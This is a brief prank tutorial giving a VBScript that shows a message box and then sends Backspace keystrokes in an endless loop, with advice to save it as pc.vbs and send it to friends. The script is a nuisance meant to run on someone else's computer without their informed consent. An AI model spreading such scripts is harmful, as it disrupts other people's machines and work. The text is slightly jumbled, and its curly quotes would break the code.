Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key
Type :
MsgBox “Let’s rock and roll”Save it as pc.vbs and send it to your friends.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop